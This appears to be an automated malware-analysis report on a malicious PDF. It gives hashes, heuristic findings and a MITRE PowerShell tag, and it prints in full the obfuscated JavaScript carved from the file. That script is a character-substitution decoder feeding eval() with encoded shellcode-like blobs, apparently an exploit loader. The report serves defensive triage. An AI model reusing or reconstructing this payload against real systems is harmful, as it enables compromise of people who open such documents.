PDF malware analysis — malicious · d8894079e90208ea

MALICIOUS

PDF

9.5 KB Created: 2010-05-20 08:53:37 Authoring application: g4B4hkCeb (via ivZIHG9xpI72A) First seen: 2026-05-10

MD5: 6cb20ac02dc61c866c35b8b2fda8a00d SHA-1: ba486b3b20815df1cdd3add7afaa60d5e90dfb1e SHA-256: d8894079e90208ea5abbf5fa5831896b7b9e2b73d04c519a5b57d51165488d70

166 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, which is obfuscated and uses an eval() call. This indicates an attempt to download and execute a second-stage payload. The obfuscation and lack of clear document content make it difficult to determine the exact family or final payload, hence the lower confidence.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 4

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

.z1%TFzO5%TO5E5%T6z}>%Tz1Fe%TF}O5%TFeO5%T}21E%T1,}1%TF6Fj%T2}Sj%T2S22%T}E2S%TEz},%TESE1%TF6E2%Tj5O(%TjSj5%T16zE%TO516%TO,zS%Tz2O2%TjzOF%TO.1F%TOOOF%T16O6%TOeO1%TOjO6%TOe16%TO2O6%T1FO5%TO(jS%Tz6jS%TO5O.%Tz.z,%TSSz2\"p;\n998\n990<l09BZ9viDXWStHlF2(j6mT39==91pc\n9999}ECHXW6(JYFmR.DA9=9TG0lq)o0v\"%T5z5z%T5z5z%T5z5z%TS6F}%Tzz>}%TOOe.%T(S}.%T(SS2%TF6zz%TF15z%TF}6E%TF(S>%T66Fe%T6666%T(}j6%T,65F%TF6F6%TO5F6%TFzE6%T.6O5%T516z%T.6O5%TOFFj%TF6Sz%TF6F}%TO5F6%T}.Sz%TO2(j%TF2E2%TSjSz%TF622%TF6F6%TEEOO%T}.F}%T …

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0007_000.js`	pdf-javascript-stream	PDF /JS object 7 at offset 0x242	8199 bytes
SHA-256: `51ec988035242cff9bbbcf79191fe7d04f9ca75e5ed22cafde120fe899b3b4c9`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). 77 of 148 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script function yfXq9pnUMJuhUsr3(yfXq9pnUMJuhUsr3,lD9ZFOBuE9OtE7hkU) {var m1uQmFnFTvJk3m7OH=yfXq9pnUMJuhUsr3. substr (lD9ZFOBuE9OtE7hkU, 1);return m1uQmFnFTvJk3m7OH;}/pmZyLs\|VWZEAKq257eA\|kTWt4QW1fe4KGU/function AXcPNn9ox5uw50vEqle(BnyosDl5Tx0QLS) {/SDdnZ2raCYS8Wx87XRUG\|kdCF77QE\|OWVs9vkrL/var Y5fDsbyfWpRbV = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/GelcRkao1uvDVOG[LDrPW6mromcP]o3aIf3aFTE//E0AaEG2QKjgggINLvqbF\|UfezY44r91\|A1M48ELIosoL12Wmj/var A74kwjSzLNJ8EaKX6jS /r4IMZ7lU2TUuFKmRF[WQsA9WL0PicyWJ]eWIc7dUQxFW7rnCR/= new String("wxvpc89 sE}e,F6LdWJkKYHhDQUg4PyVabm)7qf0ZAuBtn<iGNo3{lXTCRIrMS21z5>Oj(.");/T9ASW\|JlvlZHvJ\|IRDGvYXidtfLXi/for(nB3chQHyrcro=0;nB3chQHyrcro<Y5fDsbyfWpRbV.length;nB3chQHyrcro++) {if(BnyosDl5Tx0QLS == yfXq9pnUMJuhUsr3(A74kwjSzLNJ8EaKX6jS, nB3chQHyrcro)) {/X2cYLykUaV60[s9E0RI6ChUkB]GMapp/return yfXq9pnUMJuhUsr3(Y5fDsbyfWpRbV, nB3chQHyrcro);/hHLt6wEXIANlsMqje <ggX0HY3NlU2QIaYTKV]OsOO60/}}return BnyosDl5Tx0QLS;}/JhhnXDKu3RJxfuIYBQyZ[AvqMe4bbvZkT6O]AYa4pjrKT0iVGXv//WgVjBQAcCaCVXQB\|pcRUC9fWzEr\|bcly87XAOYcQyfmLwoj/var jA03N9ov = new String;var WcOIERHdWV = new String("\nC){9nX54fTF.fzeCdVBz9=9G0R9E{{)rvp;\nC){9MatPLauhRh03,j(V;\nZTGqXBNG9C}2fjFitdMZmyH7,vMKB}XD)oGFA1kNbks90bIOGto>tyf6l6gGpc\n99RuB<09vMKB}XD)oGFA1kNbk <0GAXu9919w90bIOGto>tyf6l6gGpc\n9999MKB}XD)oGFA1kNbk9+=9MKB}XD)oGFA1kNbk;\n998\n99MKB}XD)oGFA1kNbk9=9MKB}XD)oGFA1kNbk lT7lX{BGAvSs90bIOGto>tyf6l6gG9/91p;\n99{0XT{G9MKB}XD)oGFA1kNbk;\n8\nZTGqXBNG9)Er4)bJhG2D(NIUGviDXWStHlF2(j6mT3pc\n99C){9YXkkg0B60.HgjoLq9=9SISqSqSqSq;\n99C){9}ECHXW6(JYFmR.DA9=9TG0lq)o0v\"%T5z5z%T5z5z%T5z5z%TS6F}%Tzz>}%TOOe.%T(S}.%T(SS2%TF6zz%TF15z%TF}6E%TF(S>%T66Fe%T6666%T(}j6%T,65F%TF6F6%TO5F6%TFzE6%T.6O5%T516z%T.6O5%TOFFj%TF6Sz%TF6F}%TO5F6%T}.Sz%TO2(j%TF2E2%TSjSz%TF622%TF6F6%TEEOO%T}.F}%Tjj(j%TO>22%TSjF2%TF626%TF6F6%TEEOO%T}.Fj%TeE(j%T2S>6%TSj1,%TF6S,%TF6F6%TEEOO%T}.Fz%TSS(j%TS612%TSj(6%TF6z}%TF6F6%TEEOO%T}.66%T1F(j%TSE.O%TSj>j%TF61.%TF6F6%TEEOO%TE66}%T,jO6%T.E1e%TOO2>%T6jEE%TF(SO%TF6FF%T}2F6%T.EOO%TO5e}%TF}EE%TFF(>%TO5}O%T6j}E%TSj}.%TF6O5%TF6F6%T(j}6%T6>,.%T.6eS%Tj(Sj%TF6F6%TOOF6%T6zEE%T1EO5%T16Oe%TOO}6%Te6EE%T2S(j%TF6F6%T}6F6%TEEO5%T(>6}%T}OF,%T}EO5%TSj6j%TF6(F%TF6F6%TEEFe%T1(e6%T}zF6%Te2.2%T1((E%TF}E6%T(E.j%TF6F6%T.E2S%TO5e6%TFzEE%TFF(>%TO5}O%T6j}E%TE6Sj%TF6F6%T(>F6%T}jF(%TEEFe%T,ee}%T}ez5%T2S}e%Te6.E%T}e}6%TEEO5%T(>6z%T}OFE%T}EO5%TSj6j%TF6ee%TF6F6%TF6(>%T.E2S%TO5e6%TFjEE%TF,(>%TO5}O%T6j}E%T66Sj%TF6F6%T(>F6%TO52S%T66EE%TFF(>%TO5}O%T6j}E%TF6Sj%TF6F6%TEFF6%T},}5%TSFFe%TSFFe%TSFFe%TSFFe%TSzOe%T}>F}%TO5}e%TS,z>%T},2(%TS62S%TO5}E%TO5Sz%TFj.1%T}1O5%T}.Fz%T.eO5%TO5,z%T62.}%TFe.j%T}.2e%T..O5%TFee6%T,e2e%TEO1O%T51EF%T1eFe%T,e}.%TFS2.%T66>2%T2,,>%TFj.}%T121F%TFeF1%TE62,%T2FS5%T22,5%T.E}2%T}>SE%TS5O5%T}>O5%TFee}%T(.z1%TFzO5%TO5E5%T6z}>%Tz1Fe%TF}O5%TFeO5%T}21E%T1,}1%TF6Fj%T2}Sj%T2S22%T}E2S%TEz},%TESE1%TF6E2%Tj5O(%TjSj5%T16zE%TO516%TO,zS%Tz2O2%TjzOF%TO.1F%TOOOF%T16O6%TOeO1%TOjO6%TOe16%TO2O6%T1FO5%TO(jS%Tz6jS%TO5O.%Tz.z,%TSSz2\"p;\n99BZ9viDXWStHlF2(j6mT39==92pc\n9999YXkkg0B60.HgjoLq9=9SIzSzSzSzS;\n9999}ECHXW6(JYFmR.DA9=9TG0lq)o0v\"%T5z5z%T5z5z%T5z5z%TS6F}%Tzz>}%TOOe.%T(S}.%T(SS2%TF6zz%TF15z%TF}6E%TF(S>%T66Fe%T6666%T(}j6%T,65F%TF6F6%TO5F6%TFzE6%T.6O5%T516z%T.6O5%TOFFj%TF6Sz%TF6F}%TO5F6%T}.Sz%TO2(j%TF2E2%TSjSz%TF622%TF6F6%TEEOO%T}.F}%Tjj(j%TO>22%TSjF2%TF626%TF6F6%TEEOO%T}.Fj%TeE(j%T2S>6%TSj1,%TF6S,%TF6F6%TEEOO%T}.Fz%TSS(j%TS612%TSj(6%TF6z}%TF6F6%TEEOO%T}.66%T1F(j%TSE.O%TSj>j%TF61.%TF6F6%TEEOO%TE66}%T,jO6%T.E1e%TOO2>%T6jEE%TF(SO%TF6FF%T}2F6%T.EOO%TO5e}%TF}EE%TFF(>%TO5}O%T6j}E%TSj}.%TF6O5%TF6F6%T(j}6%T6>,.%T.6eS%Tj(Sj%TF6F6%TOOF6%T6zEE%T1EO5%T16Oe%TOO}6%Te6EE%T2S(j%TF6F6%T}6F6%TEEO5%T(>6}%T}OF,%T}EO5%TSj6j%TF6(F%TF6F6%TEEFe%T1(e6%T}zF6%Te2.2%T1((E%TF}E6%T(E.j%TF6F6%T.E2S%TO5e6%TFzEE%TFF(>%TO5}O%T6j}E%TE6Sj%TF6F6%T(>F6%T}jF(%TEEFe%T,ee}%T}ez5%T2S}e%Te6.E%T}e}6%TEEO5%T(>6z%T}OFE%T}EO5%TSj6j%TF6ee%TF6F6%TF6(>%T.E2S%TO5e6%TFjEE%TF,(>%TO5}O%T6j}E%T66Sj%TF6F6%T(>F6%TO52S%T66EE%TFF(>%TO5}O%T6j}E%TF6Sj%TF6F6%TEFF6%T},}5%TSFFe%TSFFe%TSFFe%TSFFe%TSzOe%T}>F}%TO5}e%TS,z>%T},2(%TS62S%TO5}E%TO5Sz%TFj.1%T}1O5%T}.Fz%T.eO5%TO5,z%T62.}%TFe.j%T}.2e%T..O5%TFee6%T,e2e%TEO1O%T51EF%T1eFe%T,e}.%TFS2.%T66>2%T2,,>%TFj.}%T121F%TFeF1%TE62,%T2FS5%T22,5%T.E}2%T}>SE%TS5O5%T}>O5%TFee}%T(.z1%TFzO5%TO5E5%T6z}>%Tz1Fe%TF}O5%TFeO5%T}21E%T1,}1%TF6Fj%T2}Sj%T2S22%T}E2S%TEz},%TESE1%TF6E2%Tj5O(%TjSj5%T16zE%TO516%TO,zS%Tz2O2%TjzOF%TO.1F%TOOOF%T16O6%TOeO1%TOjO6%TOe16%TO2O6%T1FO5%TO(jS%Tz6jS%TO5O.%Tz.z,%TSSz2\"p;\n998\n990<l09BZ9viDXWStHlF2(j6mT39==91pc\n9999}ECHXW6(JYFmR.DA9=9TG0lq)o0v\"%T5z5z%T5z5z%T5z5z%TS6F}%Tzz>}%TOOe.%T(S}.%T(SS2%TF6zz%TF15z%TF}6E%TF(S>%T66Fe%T6666%T(}j6%T,65F%TF6F6%TO5F6%TFzE6%T.6O5%T516z%T.6O5%TOFFj%TF6Sz%TF6F}%TO5F6%T}.Sz%TO2(j%TF2E2%TSjSz%TF622%TF6F6%TEEOO%T}.F}%Tjj(j%TO>22%TSjF2%TF626%TF6F6%TEEOO%T}.Fj%TeE(j%T2S>6%TSj1,%TF6S,%TF6F6%TEEOO%T}.Fz%TSS(j%TS612%TSj(6%TF6z}%TF6F6%TEEOO%T}.66%T1F(j%TSE.O%TSj>j%TF61.%TF6F6%TEEOO%TE66}%T,jO6%T.E1e%TOO2>%T6jEE%TF(SO%TF6FF%T}2F6%T.EOO%TO5e}%TF}EE%TFF(>%TO5}O%T6j}E%TSj}.%TF6O5%TF6F6%T(j}6%T6>,.%T.6eS%Tj(Sj%TF6F6%TOOF6%T6zEE%T1EO5%T16Oe%TOO}6%Te6EE%T2S(j%TF6F6%T}6F6%TEEO5%T(>6}%T}OF,%T}EO5%TSj6j%TF6(F%TF6F6%TEEFe%T1(e6%T}zF6%Te2.2%T1((E%TF}E6%T(E.j%TF6F6%T.E2S%TO5e6%TFzEE%TFF(>%TO5}O%T6j}E%TE6Sj%TF6F6%T(>F6%T}jF(%TEEFe%T,ee}%T}ez5%T2S}e%Te6.E%T}e}6%TEEO5%T(>6z%T}OFE%T}EO5%TSj6j%TF6ee%TF6F6%TF6(>%T.E2S%TO5e6%TFjEE%TF,(>%TO5}O%T6j}E%T66Sj%TF6F6%T(>F6%TO52S%T66EE%TFF(>%TO5}O%T6j}E%TF6Sj%TF6F6%TEFF6%T},}5%TSFFe%TSFFe%TSFFe%TSFFe%TSzOe%T}>F}%TO5}e%TS,z>%T},2(%TS62S%TO5}E%TO5Sz%TFj.1%T}1O5%T}.Fz%T.eO5%TO5,z%T62.}%TFe.j%T}.2e%T..O5%TFee6%T,e2e%TEO1O%T51EF%T1eFe%T,e}.%TFS2.%T66>2%T2,,>%TFj.}%T121F%TFeF1%TE62,%T2FS5%T22,5%T.E}2%T}>SE%TS5O5%T}>O5%TFee}%T(.z1%TFzO5%TO5E5%T6z}>%Tz1Fe%TF}O5%TFeO5%T}21E%T1,}1%TF6Fj%T2}Sj%T2S22%T}E2S%TEz},%TESE1%TF6E2%Tj5O(%TjSj5%T16zE%TO516%TO,zS%Tz2O2%TjzOF%TO.1F%TOOOF%T16O6%TOeO1%TOjO6%TOe16%TO2O6%T1FO5%TO(jS%Tz6jS%TO5O.%Tz.z,%TSSz2\"p;\n998\n99C){9In14hntzljyMCi7E9=9SI5SSSSS;\n99C){9lVa3NGI(EeujkjGY9=9}ECHXW6(JYFmR.DA <0GAXu991;\n99C){90bIOGto>tyf6l6gG9=9In14hntzljyMCi7E9-9vlVa3NGI(EeujkjGY9+9SIz(p;\n99C){9MKB}XD)oGFA1kNbk9=9TG0lq)o0v\"%T.S.S%T.S.S\"p;\n99MKB}XD)oGFA1kNbk9=9C}2fjFitdMZmyH7,vMKB}XD)oGFA1kNbks90bIOGto>tyf6l6gGp;\n99C){9fN36m)dgAGUqmziy9=9vYXkkg0B60.HgjoLq9-9SI5SSSSSp9/9In14hntzljyMCi7E;\n99ZN{9vC){9EkKH(Jydyeh3J},E9=9S;9EkKH(Jydyeh3J},E9w9fN36m)dgAGUqmziy;9EkKH(Jydyeh3J},E9++9pc\n9999nX54fTF.fzeCdVBz[EkKH(Jydyeh3J},E]9=9MKB}XD)oGFA1kNbk9+9}ECHXW6(JYFmR.DA;\n998\n8\nZTGqXBNG9,5Dmfu1kPgI5ytm5vpc\n99C){9lCU}FI4nS{)45G059=9S;\n99C){93>qy<foLjiJ7VXZ)9=9)oo CB0R0{y0{lBNG XNgX{BGAvp;\n99)oo q<0){4Bi0hTXvMatPLauhRh03,j(Vp;\n\n99BZ9v3>qy<foLjiJ7VXZ)9w9j 2pc\n9999)Er4)bJhG2D(NIUGvSp;\n9999C){9V(iz>6GF(HuE}Y,z9=9TG0lq)o0v\"%TSqSq%TSqSq\"p;\n9999RuB<09vV(iz>6GF(HuE}Y,z <0GAXu9w955.>1pV(iz>6GF(HuE}Y,z9+=9V(iz>6GF(HuE}Y,z;\n9999XuBl9 qN<<)7gXN{09=9eN<<)7 qN<<0qXFi)B<WGZNvc\n999999lT7t9:9\"\"s9ilA9:9V(iz>6GF(HuE}Y,z\n99998\n9999p;\n998\nBZ9v3>qy<foLjiJ7VXZ)9x=9.pc\n9999X{r9c\nBZ9v)oo fNq eN<<)7 A0XWqNGpc\n99999999)Er4)bJhG2D(NIUGv1p;\n99999999C){9M3aePHg)E<eAZ{d49=9TG0lq)o0v\"%S.\"p;\n99999999RuB<09vM3aePHg)E<eAZ{d4 <0GAXu9w9SI5SSSpM3aePHg)E<eAZ{d49+=9M3aePHg)E<eAZ{d4;\n99999999M3aePHg)E<eAZ{d49=9\"H \"9+9M3aePHg)E<eAZ{d4;\n)oo fNq eN<<)7 A0XWqNGvM3aePHg)E<eAZ{d4p;\n99999999lCU}FI4nS{)45G059=92;\n9999998\n9999990<l09c\n99999999lCU}FI4nS{)45G059=92;\n9999998\n99998\n9999q)Xqu9v0pc\n999999lCU}FI4nS{)45G059=92;\n99998\n9999BZ9vlCU}FI4nS{)45G059==92pc\n999999BZ9vv3>qy<foLjiJ7VXZ)9x=9j 2&&93>qy<foLjiJ7VXZ)9w9.ppc\n99999999)Er4)bJhG2D(NIUGv2p;\n99999999C){9u5V5WJdQAM)lKNT<9=9\"21..................\";\n99999999ZN{9v}gI.oQt2}Cu{Grki9=9S;9}gI.oQt2}Cu{Grki9w91jO;9}gI.oQt2}Cu{Grki9++9pc\n9999999999u5V5WJdQAM)lKNT<9+=9\"(\";\n999999998\n99999999TXB< o{BGXZv\"%5>SSSZ\"s9u5V5WJdQAM)lKNT<p;\n9999998\n99998\n998\n8\n)oo F3oKE(<{jKtUSf,N9=9,5Dmfu1kPgI5ytm5;\nMatPLauhRh03,j(V9=9)oo l0X4Bi0hTXv\")oo F3oKE(<{jKtUSf,Nvp\"s92Sp;\n");/G0wI0SepWMly{MmnKAnYYGpNlRZY}AzCzmLq4qVR27GhKtKU//ysI4YWfpw4lvuokW\|QRhmiZjp6tYHEI5wQz\|nV0ZPcK/for(GaeVJjTqJn4so=0;GaeVJjTqJn4so<WcOIERHdWV.length;GaeVJjTqJn4so++)jA03N9ov += AXcPNn9ox5uw50vEqle(yfXq9pnUMJuhUsr3(WcOIERHdWV,GaeVJjTqJn4so));eval(jA03N9ov);/HvW8CnfpM5P129Q9DY40[uBRF1rVU1Vcnrap]AUh0kZtjps/

Open this report in the interactive analyzer, or submit your own file for analysis.